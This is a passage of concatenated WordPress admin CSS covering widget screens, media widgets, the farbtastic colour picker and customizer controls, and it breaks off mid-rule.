ease-in-out}.widgets-chooser .widgets-chooser-button:focus,.widgets-chooser .widgets-chooser-button:hover{outline:0;text-decoration:underline}.widgets-chooser li:last-child{border:none}.widgets-chooser .widgets-chooser-selected .widgets-chooser-button{background:var(--wp-admin-theme-color,#3858e9);color:#fff}.widgets-chooser .widgets-chooser-selected:before{content:"\f147";content:"\f147"/'';display:block;-webkit-font-smoothing:antialiased;font:normal 26px/1 dashicons;color:#fff;position:absolute;top:7px;left:5px}.widgets-chooser .widgets-chooser-actions{padding:10px 0 12px;text-align:center}#available-widgets .widget .widget-top{cursor:pointer}#available-widgets .widget.ui-draggable-dragging .widget-top{cursor:move}.text-widget-fields{position:relative}.text-widget-fields [hidden]{display:none}.text-widget-fields .wp-pointer.wp-pointer-top{position:absolute;z-index:3;top:100px;right:10px;left:10px}.text-widget-fields .wp-pointer .wp-pointer-arrow{left:auto;right:15px}.text-widget-fields .wp-pointer .wp-pointer-buttons{line-height:1.4}.custom-html-widget-fields>p>.CodeMirror{border:1px solid #dcdcde}.custom-html-widget-fields code{padding-top:1px;padding-bottom:1px}ul.CodeMirror-hints{z-index:101}.widget-control-actions .custom-html-widget-save-button.button.validation-blocked{cursor:not-allowed}@media screen and (max-width:782px){.editwidget .widget-inside input[type=checkbox],.editwidget .widget-inside input[type=radio],.widgets-holder-wrap .widget-inside input[type=checkbox],.widgets-holder-wrap .widget-inside input[type=radio]{margin:.25rem .25rem .25rem 0}}@media screen and (max-width:480px){div.widget-liquid-left{width:100%;float:none;border-right:none;padding-right:0}#widgets-left .sidebar-name{margin-right:0}#widgets-left #available-widgets .widget-top{margin-right:0}#widgets-left .inactive-sidebar .widgets-sortables{margin-right:0}div.widget-liquid-right{width:100%;float:none}div.widget{max-width:480px}.widget-access-link{float:none;margin:15px 0 0}}@media screen and (max-width:320px){div.widget{max-width:320px}}@media only screen and (min-width:1250px){#widgets-left #available-widgets .widget{width:49%;float:left}.widget.ui-draggable-dragging{min-width:49%}#widgets-left #available-widgets .widget:nth-child(2n){float:right}#widgets-right .sidebars-column-1,#widgets-right .sidebars-column-2{float:left;width:49%}#widgets-right .sidebars-column-1{margin-right:2%}#widgets-right.single-sidebar .sidebars-column-1,#widgets-right.single-sidebar .sidebars-column-2{float:none;width:100%;margin:0}}/*! This file is auto-generated */ /* General Widgets Styles */ .widget { margin: 0 auto 10px; position: relative; box-sizing: border-box; } .widget.open { z-index: 99; } .widget.open:focus-within { z-index: 100; } .widget-top { font-size: 13px; font-weight: 600; background: #f6f7f7; } .widget-top .widget-action { border: 0; margin: 0; padding: 10px; background: none; cursor: pointer; } .widget-title h3, .widget-title h4 { margin: 0; padding: 15px; font-size: 1em; line-height: 1; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; -webkit-user-select: none; user-select: none; } .widgets-holder-wrap .widget-inside { border-top: none; padding: 1px 15px 15px; line-height: 1.23076923; } .widget.widget-dirty .widget-control-close-wrapper { display: none; } .in-widget-title, #widgets-right a.widget-control-edit, #available-widgets .widget-description { color: #646970; } .deleting .widget-title, .deleting .widget-top .widget-action .toggle-indicator:before { color: #a7aaad; } /* Media Widgets */ .wp-core-ui .media-widget-control.selected .placeholder, .wp-core-ui .media-widget-control.selected .not-selected, .wp-core-ui .media-widget-control .selected { display: none; } .media-widget-control.selected .selected { display: inline-block; } .media-widget-buttons { text-align: right; margin-top: 0; } .media-widget-control .media-widget-buttons .button { width: auto; height: auto; margin-top: 12px; white-space: normal; } .media-widget-buttons .button:first-child { margin-left: 8px; } .media-widget-control .attachment-media-view .button-add-media, .media-widget-control .placeholder { border: 1px dashed #c3c4c7; box-sizing: border-box; cursor: pointer; line-height: 1.6; padding: 9px 0; position: relative; text-align: center; width: 100%; } .media-widget-control .attachment-media-view .button-add-media { cursor: pointer; background-color: #f0f0f1; color: #2c3338; } .media-widget-control .attachment-media-view .button-add-media:hover { background-color: #fff; } .media-widget-control .attachment-media-view .button-add-media:focus { background-color: #fff; border-style: solid; border-color: #4f94d4; box-shadow: 0 0 3px rgba(34, 113, 177, 0.8); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } .media-widget-control .media-widget-preview { background: transparent; text-align: center; } .media-widget-control .media-widget-preview .notice { text-align: initial; } .media-frame .media-widget-embed-notice p code, .media-widget-control .notice p code { padding: 0 0 0 3px; } .media-frame .media-widget-embed-notice { margin-top: 16px; } .media-widget-control .media-widget-preview img { max-width: 100%; vertical-align: middle; background-image: linear-gradient(-45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7), linear-gradient(-45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7); background-position: 100% 0, 10px 10px; background-size: 20px 20px; } .media-widget-control .media-widget-preview .wp-video-shortcode { background: #000; } .media-frame.media-widget .media-toolbar-secondary { min-width: 300px; } .media-frame.media-widget .image-details .embed-media-settings .setting.align, .media-frame.media-widget .attachment-display-settings .setting.align, .media-frame.media-widget .embed-media-settings .setting.align, .media-frame.media-widget .embed-media-settings .legend-inline, .media-frame.media-widget .embed-link-settings .setting.link-text, .media-frame.media-widget .replace-attachment, .media-frame.media-widget .checkbox-setting.autoplay { display: none; } .media-widget-video-preview { width: 100%; } .media-widget-video-link { display: inline-block; min-height: 132px; width: 100%; background: #000; } .media-widget-video-link .dashicons { font: normal 60px/1 'dashicons'; position: relative; width: 100%; top: -90px; color: #fff; text-decoration: none; } .media-widget-video-link.no-poster .dashicons { top: 30px; } .media-frame #embed-url-field.invalid, .media-widget-image-link > .link:invalid { border: 1px solid #d63638; } .media-widget-image-link { margin: 1em 0; } .media-widget-gallery-preview { display: flex; justify-content: flex-start; flex-wrap: wrap; margin: -1.79104477%; } .media-widget-preview.media_gallery, .media-widget-preview.media_image { cursor: pointer; } .media-widget-preview .placeholder { background: #f0f0f1; } .media-widget-gallery-preview .gallery-item { box-sizing: border-box; width: 50%; margin: 0; background: transparent; } .media-widget-gallery-preview .gallery-item .gallery-icon { margin: 4.5%; } /* * Use targeted nth-last-child selectors to control the size of each image * based on how many gallery items are present in the grid. * See: https://alistapart.com/article/quantity-queries-for-css */ .media-widget-gallery-preview .gallery-item:nth-last-child(3):first-child, .media-widget-gallery-preview .gallery-item:nth-last-child(3):first-child ~ .gallery-item, .media-widget-gallery-preview .gallery-item:nth-last-child(n+5), .media-widget-gallery-preview .gallery-item:nth-last-child(n+5) ~ .gallery-item, .media-widget-gallery-preview .gallery-item:nth-last-child(n+6), .media-widget-gallery-preview .gallery-item:nth-last-child(n+6) ~ .gallery-item { max-width: 33.33%; } .media-widget-gallery-preview .gallery-item img { height: auto; vertical-align: bottom; } .media-widget-gallery-preview .gallery-icon { position: relative; } .media-widget-gallery-preview .gallery-icon-placeholder { position: absolute; top: 0; bottom: 0; width: 100%; box-sizing: border-box; display: flex; align-items: center; justify-content: center; background-color: rgba(0, 0, 0, 0.5); } .media-widget-gallery-preview .gallery-icon-placeholder-text { font-weight: 600; font-size: 2em; color: #fff; } /* Widget Dragging Helpers */ .widget.ui-draggable-dragging { min-width: 100%; } .widget.ui-sortable-helper { opacity: 0.8; } .widget-placeholder { border: 1px dashed #c3c4c7; margin: 0 auto 10px; height: 45px; width: 100%; box-sizing: border-box; } #widgets-right .widget-placeholder { margin-top: 0; } #widgets-right .closed .widget-placeholder { height: 0; border: 0; margin-top: -10px; } /* Widget Sidebars */ .sidebar-name { position: relative; box-sizing: border-box; } .js .sidebar-name { cursor: pointer; } .sidebar-name .handlediv { float: left; width: 38px; height: 38px; border: 0; margin: 0; padding: 8px; background: none; cursor: pointer; outline: none; } #widgets-right .sidebar-name .handlediv { margin: 5px 0 0 3px; } .sidebar-name .handlediv:focus { box-shadow: none; /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } #widgets-left .sidebar-name .toggle-indicator { display: none; } #widgets-left .widgets-holder-wrap.closed .sidebar-name .toggle-indicator, #widgets-left .sidebar-name:hover .toggle-indicator, #widgets-left .sidebar-name .handlediv:focus .toggle-indicator { display: block; } .sidebar-name .toggle-indicator:before { padding: 1px 0 1px 2px; border-radius: 50%; } .sidebar-name .handlediv:focus .toggle-indicator:before { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .sidebar-name h2, .sidebar-name h3 { margin: 0; padding: 8px 10px; overflow: hidden; white-space: normal; line-height: 1.5; } .widgets-holder-wrap .description { padding: 0 0 15px; margin: 0; font-style: normal; color: #646970; } .widget-holder .description, .inactive-sidebar .description { color: #50575e; } #widgets-right .widgets-holder-wrap .description { padding-right: 7px; padding-left: 7px; } /* Widgets 2-col Layout */ div.widget-liquid-left { margin: 0; width: 38%; float: right; } div.widget-liquid-right { float: left; width: 58%; } /* Widgets Left - Available Widgets */ div#widgets-left { padding-top: 12px; } div#widgets-left .closed .sidebar-name, div#widgets-left .inactive-sidebar.closed .sidebar-name { margin-bottom: 10px; } div#widgets-left .sidebar-name h2, div#widgets-left .sidebar-name h3 { padding: 10px 0; margin: 0 0 0 10px; } #widgets-left .widgets-holder-wrap, div#widgets-left .widget-holder { background: transparent; border: none; } #widgets-left .widgets-holder-wrap { border: none; box-shadow: none; } #available-widgets .widget { margin: 0; } #available-widgets .widget:nth-child(odd) { clear: both; } #available-widgets .widget .widget-description { display: block; padding: 10px 15px; font-size: 12px; overflow-wrap: break-word; word-wrap: break-word; -ms-word-break: break-all; word-break: break-word; hyphens: auto; } #available-widgets #widget-list { position: relative; } /* Inactive Sidebars */ #widgets-left .inactive-sidebar { clear: both; width: 100%; background: transparent; padding: 0; margin: 0 0 20px; border: none; box-shadow: none; } #widgets-left .inactive-sidebar.first { margin-top: 40px; } /* Not sure what this is for... */ div#widgets-left .inactive-sidebar .widget.expanded { right: auto; } .widget-title-action { float: left; position: relative; } div#widgets-left .inactive-sidebar .widgets-sortables { min-height: 42px; padding: 0; background: transparent; margin: 0; position: relative; } /* Widgets Right */ div#widgets-right .sidebars-column-1, div#widgets-right .sidebars-column-2 { max-width: 450px; } div#widgets-right .widgets-holder-wrap { margin: 10px 0 0; } div#widgets-right .sidebar-description { min-height: 20px; margin-top: -5px; } div#widgets-right .sidebar-name h2, div#widgets-right .sidebar-name h3 { padding: 15px 7px 15px 15px; } div#widgets-right .widget-top { padding: 0; } div#widgets-right .widgets-sortables { padding: 0 8px; margin-bottom: 9px; position: relative; min-height: 123px; } div#widgets-right .closed .widgets-sortables { min-height: 0; margin-bottom: 0; } .sidebar-name .spinner, .remove-inactive-widgets .spinner { float: none; position: relative; top: -2px; margin: -5px 5px; } .sidebar-name .spinner { position: absolute; top: 18px; left: 30px; } /* Dragging a widget over a closed sidebar */ #widgets-right .widgets-holder-wrap.widget-hover { border-color: #787c82; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.3); } /* Accessibility Mode */ .widget-access-link { float: left; margin: -5px 10px 10px 0; } .widgets_access #widgets-left .widget .widget-top { cursor: auto; } .widgets_access #wpwrap .widgets-holder-wrap.closed .sidebar-description, .widgets_access #wpwrap .widgets-holder-wrap.closed .widget, .widgets_access #wpwrap .widget-control-edit { display: block; } .widgets_access #widgets-left .widget .widget-top:hover, .widgets_access #widgets-right .widget .widget-top:hover { border-color: #dcdcde; } #available-widgets .widget-control-edit .edit, #available-widgets .widget-action .edit, #widgets-left .inactive-sidebar .widget-control-edit .add, #widgets-left .inactive-sidebar .widget-action .add, #widgets-right .widget-control-edit .add, #widgets-right .widget-action .add { display: none; } .widget-control-edit { display: block; color: #646970; background: #f0f0f1; padding: 0 15px; line-height: 3.30769230; border-right: 1px solid #dcdcde; } #widgets-left .widget-control-edit:hover, #widgets-right .widget-control-edit:hover { color: #fff; background: #3c434a; border-right: 0; outline: 1px solid #3c434a; } .widgets-holder-wrap .sidebar-name, .widgets-holder-wrap .sidebar-description { -webkit-user-select: none; user-select: none; } .editwidget { margin: 0 auto; } .editwidget .widget-inside { display: block; padding: 0 15px; } .widget-control-actions { display: flex; align-items: center; justify-content: space-between; } .editwidget .widget-control-actions { margin-top: 20px; } .js .widgets-holder-wrap.closed .widget, .js .widgets-holder-wrap.closed .sidebar-description, .js .widgets-holder-wrap.closed .remove-inactive-widgets, .js .widgets-holder-wrap.closed .description, .js .closed br.clear { display: none; } .js .widgets-holder-wrap.closed .widget.ui-sortable-helper { display: block; } /* Hide Widget Settings by Default */ .widget-inside, .widget-description { display: none; } .widget-inside { background: #fff; } .widget-inside select { max-width: 100%; } /* Dragging widgets over the available widget area show's a "Deactivate" message */ #removing-widget { display: none; font-weight: 400; padding-right: 15px; font-size: 12px; line-height: 1; color: #000; } .js #removing-widget { color: #72aee6; } .widget-control-noform, #access-off, .widgets_access .widget-action, .widgets_access .handlediv, .widgets_access #access-on, .widgets_access .widget-holder .description, .no-js .widget-holder .description { display: none; } .widgets_access .widget-holder, .widgets_access #widget-list { padding-top: 10px; } .widgets_access #access-off { display: inline; } .widgets_access .sidebar-name, .widgets_access .widget .widget-top { cursor: default; } /* Widgets Area Chooser */ .widget-liquid-left #widgets-left.chooser #available-widgets .widget, .widget-liquid-left #widgets-left.chooser .inactive-sidebar { transition: opacity 0.1s linear; } .widget-liquid-left #widgets-left.chooser #available-widgets .widget, .widget-liquid-left #widgets-left.chooser .inactive-sidebar { /* -webkit-filter: blur(1px); */ opacity: 0.2; pointer-events: none; } .widget-liquid-left #widgets-left.chooser #available-widgets .widget-in-question { /* -webkit-filter: none; */ opacity: 1; pointer-events: auto; } .widgets-chooser ul, #widgets-left .widget-in-question .widget-top, #available-widgets .widget-top:hover, div#widgets-right .widget-top:hover, #widgets-left .widget-top:hover { border-color: #8c8f94; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.1); } .widgets-chooser ul.widgets-chooser-sidebars { margin: 0; list-style-type: none; max-height: 300px; overflow: auto; } .widgets-chooser { display: none; } .widgets-chooser ul { border: 1px solid #c3c4c7; } .widgets-chooser li { border-bottom: 1px solid #c3c4c7; background: #fff; margin: 0; position: relative; } .widgets-chooser .widgets-chooser-button { width: 100%; padding: 10px 35px 10px 15px; background: transparent; border: 0; box-sizing: border-box; text-align: right; cursor: pointer; transition: background 0.2s ease-in-out; } /* @todo looks like these hover/focus states are overridden by .widgets-chooser-selected */ .widgets-chooser .widgets-chooser-button:hover, .widgets-chooser .widgets-chooser-button:focus { outline: none; text-decoration: underline; } .widgets-chooser li:last-child { border: none; } .widgets-chooser .widgets-chooser-selected .widgets-chooser-button { background: var(--wp-admin-theme-color, #3858e9); color: #fff; } .widgets-chooser .widgets-chooser-selected:before { content: "\f147"; content: "\f147" / ''; display: block; -webkit-font-smoothing: antialiased; font: normal 26px/1 dashicons; color: #fff; position: absolute; top: 7px; right: 5px; } .widgets-chooser .widgets-chooser-actions { padding: 10px 0 12px; text-align: center; } #available-widgets .widget .widget-top { cursor: pointer; } #available-widgets .widget.ui-draggable-dragging .widget-top { cursor: move; } /* =Specific widget styling -------------------------------------------------------------- */ .text-widget-fields { position: relative; } .text-widget-fields [hidden] { display: none; } .text-widget-fields .wp-pointer.wp-pointer-top { position: absolute; z-index: 3; top: 100px; left: 10px; right: 10px; } .text-widget-fields .wp-pointer .wp-pointer-arrow { right: auto; left: 15px; } .text-widget-fields .wp-pointer .wp-pointer-buttons { line-height: 1.4; } .custom-html-widget-fields > p > .CodeMirror { border: 1px solid #dcdcde; } .custom-html-widget-fields code { padding-top: 1px; padding-bottom: 1px; } ul.CodeMirror-hints { z-index: 101; /* Due to z-index 100 set on .widget.open */ } .widget-control-actions .custom-html-widget-save-button.button.validation-blocked { cursor: not-allowed; } /* =Media Queries -------------------------------------------------------------- */ @media screen and (max-width: 782px) { .widgets-holder-wrap .widget-inside input[type="checkbox"], .widgets-holder-wrap .widget-inside input[type="radio"], .editwidget .widget-inside input[type="checkbox"], /* Selectors for the "accessibility mode" page. */ .editwidget .widget-inside input[type="radio"] { margin: 0.25rem 0 0.25rem 0.25rem; } } @media screen and (max-width: 480px) { div.widget-liquid-left { width: 100%; float: none; border-left: none; padding-left: 0; } #widgets-left .sidebar-name { margin-left: 0; } #widgets-left #available-widgets .widget-top { margin-left: 0; } #widgets-left .inactive-sidebar .widgets-sortables { margin-left: 0; } div.widget-liquid-right { width: 100%; float: none; } div.widget { max-width: 480px; } .widget-access-link { float: none; margin: 15px 0 0; } } @media screen and (max-width: 320px) { div.widget { max-width: 320px; } } @media only screen and (min-width: 1250px) { #widgets-left #available-widgets .widget { width: 49%; float: right; } .widget.ui-draggable-dragging { min-width: 49%; } #widgets-left #available-widgets .widget:nth-child(even) { float: left; } #widgets-right .sidebars-column-1, #widgets-right .sidebars-column-2 { float: right; width: 49%; } #widgets-right .sidebars-column-1 { margin-left: 2%; } #widgets-right.single-sidebar .sidebars-column-1, #widgets-right.single-sidebar .sidebars-column-2 { float: none; width: 100%; margin: 0; } } .farbtastic { position: relative; } .farbtastic * { position: absolute; cursor: crosshair; } .farbtastic, .farbtastic .wheel { width: 195px; height: 195px; } .farbtastic .color, .farbtastic .overlay { top: 47px; left: 47px; width: 101px; height: 101px; } .farbtastic .wheel { background: url(../images/wheel.png) no-repeat; width: 195px; height: 195px; } .farbtastic .overlay { background: url(../images/mask.png) no-repeat; } .farbtastic .marker { width: 17px; height: 17px; margin: -8px 0 0 -8px; overflow: hidden; background: url(../images/marker.png) no-repeat; } /*! This file is auto-generated */ @media (prefers-reduced-motion:no-preference){@view-transition{navigation:auto}#adminmenu>.menu-top{view-transition-name:attr(id type(<custom-ident>),none)}}body { overflow: hidden; -webkit-text-size-adjust: 100%; } .customize-controls-close, .widget-control-actions a { text-decoration: none; } #customize-controls h3 { font-size: 14px; } #customize-controls img { max-width: 100%; } #customize-controls .submit { text-align: center; } #customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked { background-color: rgba(0, 0, 0, 0.7); padding: 25px; } #customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked .customize-changeset-locked-message { margin-left: auto; margin-right: auto; max-width: 366px; min-height: 64px; width: auto; padding: 25px; position: relative; background: #fff; box-shadow: 0 3px 6px rgba(0, 0, 0, 0.3); line-height: 1.5; overflow-y: auto; text-align: left; top: calc( 50% - 100px ); } #customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked .customize-changeset-locked-message.has-avatar { padding-left: 109px; } #customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked .currently-editing { margin-top: 0; } #customize-controls #customize-notifications-area .notice.notification-overlay.notification-changeset-locked .action-buttons { margin-bottom: 0; } .customize-changeset-locked-avatar { width: 64px; position: absolute; left: 25px; top: 25px; } .wp-core-ui.wp-customizer .customize-changeset-locked-message a.button { margin-right: 10px; margin-top: 0; } #customize-controls .description { color: #50575e; } #customize-save-button-wrapper { float: right; margin-top: 7px; /* Vertically center 32px button in 45px header */ } body:not(.ready) #customize-save-button-wrapper .save { visibility: hidden; } #customize-save-button-wrapper .save { float: left; border-radius: 3px; box-shadow: none; /* @todo Adjust box shadow based on the disable states of paired button. */ margin-top: 0; } #customize-save-button-wrapper .save.has-next-sibling { border-radius: 3px 0 0 3px; } #customize-sidebar-outer-content { position: absolute; top: 0; bottom: 0; left: 0; visibility: hidden; overflow-x: hidden; overflow-y: auto; width: 100%; margin: 0; z-index: -1; background: #f0f0f1; transition: left .18s; border-right: 1px solid #dcdcde; border-left: 1px solid #dcdcde; height: 100%; } @media (prefers-reduced-motion: reduce) { #customize-sidebar-outer-content { transition: none; } } #customize-theme-controls .control-section-outer { display: none !important; } #customize-outer-theme-controls .accordion-section-content { padding: 12px; } #customize-outer-theme-controls .accordion-section-content.open { display: block; } .outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content { visibility: visible; left: 100%; transition: left .18s; } @media (prefers-reduced-motion: reduce) { .outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content { transition: none; } } .customize-outer-pane-parent { margin: 0; } .outer-section-open .wp-full-overlay.expanded .wp-full-overlay-main { left: 300px; opacity: 0.4; } .outer-section-open .wp-full-overlay.expanded.preview-tablet .wp-full-overlay-main, .outer-section-open .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main, .adding-menu-items .wp-full-overlay.expanded.preview-tablet .wp-full-overlay-main, .adding-menu-items .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main, .adding-widget .wp-full-overlay.expanded.preview-tablet .wp-full-overlay-main, .adding-widget .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main { left: 64%; } #customize-outer-theme-controls li.notice { padding-top: 8px; padding-bottom: 8px; margin-left: 0; margin-bottom: 10px; } #publish-settings { text-indent: 0; border-radius: 0 3px 3px 0; padding-left: 0; padding-right: 0; box-shadow: none; /* @todo Adjust box shadow based on the disable states of paired button. */ font-size: 14px; width: 30px; float: left; transform: none; margin-top: 0; line-height: 2; } body:not(.ready) #publish-settings, body.trashing #customize-save-button-wrapper .save, body.trashing #publish-settings { display: none; } #customize-header-actions .spinner { margin-top: 13px; /* Vertically center 20px spinner in 45px header */ margin-right: 4px; } .saving #customize-header-actions .spinner, .trashing #customize-header-actions .spinner { visibility: visible; } #customize-header-actions { border-bottom: 1px solid #dcdcde; } #customize-controls .wp-full-overlay-sidebar-content { overflow-y: auto; overflow-x: hidden; } .outer-section-open #customize-controls .wp-full-overlay-sidebar-content { background: #f0f0f1; } #customize-controls .customize-info { border: none; border-bottom: 1px solid #dcdcde; margin-bottom: 15px; } #customize-control-changeset_status .customize-inside-control-row, #customize-control-changeset_preview_link input { background-color: #fff; border-bottom: 1px solid #dcdcde; box-sizing: content-box; width: 100%; margin-left: -12px; padding-left: 12px; padding-right: 12px; } #customize-control-trash_changeset { margin-top: 20px; } #customize-control-trash_changeset .button-link { position: relative; padding-left: 24px; display: inline-block; } #customize-control-trash_changeset .button-link:before { content: "\f182"; content: "\f182" / ''; font: normal 22px dashicons; text-decoration: none; position: absolute; left: 0; top: -2px; } #customize-controls .date-input:invalid { border-color: #d63638; } #customize-control-changeset_status .customize-inside-control-row { padding-top: 10px; padding-bottom: 10px; font-weight: 500; } #customize-control-changeset_status .customize-inside-control-row:first-of-type { border-top: 1px solid #dcdcde; } #customize-control-changeset_status .customize-control-title { margin-bottom: 6px; } #customize-control-changeset_status input { margin-left: 0; } #customize-control-changeset_preview_link { position: relative; display: block; } .preview-link-wrapper .customize-copy-preview-link.preview-control-element.button { margin: 0; position: absolute; top: 50%; transform: translateY(-50%) !important; right: 0; background: #fff !important; } .preview-link-wrapper { position: relative; } .customize-copy-preview-link:before, .customize-copy-preview-link:after { content: ""; height: 40px; position: absolute; background: #fff; top: 0; } .customize-copy-preview-link:before { left: -10px; width: 9px; opacity: 0.75; } .customize-copy-preview-link:after { left: -5px; width: 4px; opacity: 0.8; } #customize-control-changeset_preview_link input { line-height: 2.85714286; /* 40px */ border-top: 1px solid #dcdcde; border-left: none; border-right: none; text-indent: -999px; color: #fff; /* Only necessary for IE11 */ min-height: 40px; } #customize-control-changeset_preview_link label { position: relative; display: block; } #customize-control-changeset_preview_link a { display: inline-block; position: absolute; white-space: nowrap; overflow: hidden; width: 90%; bottom: 14px; font-size: 14px; text-decoration: none; } #customize-control-changeset_preview_link a.disabled, #customize-control-changeset_preview_link a.disabled:active, #customize-control-changeset_preview_link a.disabled:focus, #customize-control-changeset_preview_link a.disabled:visited { color: #000; opacity: 0.4; cursor: default; outline: none; box-shadow: none; } #sub-accordion-section-publish_settings .customize-section-description-container { display: none; } #customize-controls .customize-info.section-meta { margin-bottom: 15px; } .customize-control-date_time .customize-control-description + .date-time-fields.includes-time { margin-top: 10px; } .customize-control.customize-control-date_time .date-time-fields .date-input.day { margin-right: 0; } .date-time-fields .date-input.month { width: auto; margin: 0; } .date-time-fields .date-input.day, .date-time-fields .date-input.hour, .date-time-fields .date-input.minute { width: 46px; } .customize-control-date_time select { vertical-align: top; } .date-time-fields .date-input.year { width: 65px; } .date-time-fields .date-input.meridian { width: auto; margin: 0; } .date-time-fields .time-row { margin-top: 12px; } #customize-control-changeset_preview_link { margin-top: 6px; } #customize-control-changeset_status { margin-bottom: 0; padding-bottom: 0; } #customize-control-changeset_scheduled_date { box-sizing: content-box; width: 100%; margin-left: -12px; padding: 12px; background: #fff; border-bottom: 1px solid #dcdcde; margin-bottom: 0; } #customize-control-site_icon .customize-control-description, #customize-control-changeset_scheduled_date .customize-control-description { font-style: normal; } #customize-controls .customize-info.is-in-view, #customize-controls .customize-section-title.is-in-view { position: absolute; z-index: 9; width: 100%; box-shadow: 0 1px 0 rgba(0, 0, 0, 0.1); } #customize-controls .customize-section-title.is-in-view { margin-top: 0; } #customize-controls .customize-info.is-in-view + .accordion-section { margin-top: 15px; } #customize-controls .customize-info.is-sticky, #customize-controls .customize-section-title.is-sticky { position: fixed; top: 46px; } #customize-controls .customize-info .accordion-section-title { background: #fff; color: #50575e; border-left: none; border-right: none; border-bottom: none; cursor: default; padding: 10px 10px 11px 14px; } #customize-controls .customize-info.open .accordion-section-title:after, #customize-controls .customize-info .accordion-section-title:hover:after, #customize-controls .customize-info .accordion-section-title:focus:after { color: #2c3338; } #customize-controls .customize-info .accordion-section-title:after { display: none; } #customize-controls .customize-info .preview-notice { font-size: 13px; line-height: 1.9; margin: 0; font-weight: 400; color: #50575e; } #customize-controls .customize-pane-child .customize-section-title h3, #customize-controls .customize-pane-child h3.customize-section-title, #customize-outer-theme-controls .customize-pane-child .customize-section-title h3, #customize-outer-theme-controls .customize-pane-child h3.customize-section-title, #customize-controls .customize-info .panel-title { font-size: 20px; font-weight: 200; line-height: 26px; display: block; overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } #customize-controls .customize-section-title span.customize-action { overflow: hidden; white-space: nowrap; text-overflow: ellipsis; } #customize-controls .customize-info .customize-help-toggle { position: absolute; top: 4px; right: 1px; padding: 20px 20px 10px 10px; width: 20px; height: 20px; cursor: pointer; box-shadow: none; background: transparent; color: #50575e; border: none; } #customize-controls .customize-info .customize-help-toggle:before { position: absolute; top: 5px; left: 6px; } #customize-controls .customize-info .customize-panel-description, #customize-controls .customize-info .customize-section-description, #customize-outer-theme-controls .customize-info .customize-section-description, #customize-controls .no-widget-areas-rendered-notice { color: #50575e; display: none; background: #fff; padding: 12px 15px; border-top: 1px solid #dcdcde; } #customize-controls .customize-info .customize-panel-description.open + .no-widget-areas-rendered-notice { border-top: none; } .no-widget-areas-rendered-notice { font-style: italic; } .no-widget-areas-rendered-notice p:first-child { margin-top: 0; } .no-widget-areas-rendered-notice p:last-child { margin-bottom: 0; } #customize-controls .customize-info .customize-section-description { margin-bottom: 15px; } #customize-controls .customize-info .customize-panel-description p:first-child, #customize-controls .customize-info .customize-section-description p:first-child { margin-top: 0; } #customize-controls .customize-info .customize-panel-description p:last-child, #customize-controls .customize-info .customize-section-description p:last-child { margin-bottom: 0; } #customize-controls .current-panel .control-section > h3.accordion-section-title { padding-right: 30px; } #customize-theme-controls .control-section, #customize-outer-theme-controls .control-section { border: none; } #customize-theme-controls .accordion-section-title, #customize-outer-theme-controls .accordion-section-title { color: #50575e; background-color: #fff; border-bottom: 1px solid #dcdcde; border-left: 4px solid #fff; transition: .15s color ease-in-out, .15s background-color ease-in-out, .15s border-color ease-in-out; } .accordion-section-title:has(button.accordion-trigger), #customize-controls .current-panel .control-section > h3.accordion-section-title:has(button.accordion-trigger) { padding: 0; } .accordion-section-title button.accordion-trigger { all: unset; width: 100%; padding: 10px 30px 11px 14px; display: flex; align-items: center; box-sizing: border-box; } .accordion-section-title button.accordion-trigger:has(.menu-in-location) { display: block; } .accordion-section-title button.accordion-trigger .spinner { margin-top: 0; } @media (prefers-reduced-motion: reduce) { #customize-theme-controls .accordion-section-title, #customize-outer-theme-controls .accordion-section-title { transition: none; } } #customize-controls #customize-theme-controls .customize-themes-panel .accordion-section-title { color: #50575e; background-color: #fff; border-left: 4px solid #fff; } #customize-theme-controls .accordion-section-title:after, #customize-outer-theme-controls .accordion-section-title:after { content: "\f345"; content: "\f345" / ''; color: #a7aaad; pointer-events: none; } #customize-theme-controls .accordion-section-content, #customize-outer-theme-controls .accordion-section-content { color: #50575e; background: transparent; } #accordion-section-themes + .control-section { border-top: 1px solid #dcdcde; } .js .control-section:hover .accordion-section-title, .js .control-section .accordion-section-title:hover, .js .control-section.open .accordion-section-title, .js .control-section .accordion-section-title:focus { background: #f6f7f7; } #customize-theme-controls .control-section.open { border-bottom: 1px solid #f0f0f1; } #customize-theme-controls .control-section.open .accordion-section-title, #customize-outer-theme-controls .control-section.open .accordion-section-title { border-bottom-color: #f0f0f1 !important; } #customize-theme-controls .control-section:last-of-type.open, #customize-theme-controls .control-section:last-of-type > .accordion-section-title { border-bottom-color: #dcdcde; } #customize-theme-controls .control-panel-content:not(.control-panel-nav_menus) .control-section:nth-child(2), #customize-theme-controls .control-panel-nav_menus .control-section-nav_menu, #customize-theme-controls .control-section-nav_menu_locations .accordion-section-title { border-top: 1px solid #dcdcde; } #customize-theme-controls .control-panel-nav_menus .control-section-nav_menu + .control-section-nav_menu { border-top: none; } #customize-theme-controls > ul { margin: 0; } #customize-theme-controls .accordion-section-content { position: absolute; top: 0; left: 100%; width: 100%; margin: 0; padding: 12px; box-sizing: border-box; } #customize-info, #customize-theme-controls .customize-pane-parent, #customize-theme-controls .customize-pane-child { overflow: visible; width: 100%; margin: 0; padding: 0; box-sizing: border-box; transition: 0.18s transform cubic-bezier(0.645, 0.045, 0.355, 1); /* easeInOutCubic */ } @media (prefers-reduced-motion: reduce) { #customize-info, #customize-theme-controls .customize-pane-parent, #customize-theme-controls .customize-pane-child { transition: none; } } #customize-theme-controls .customize-pane-child.skip-transition { transition: none; 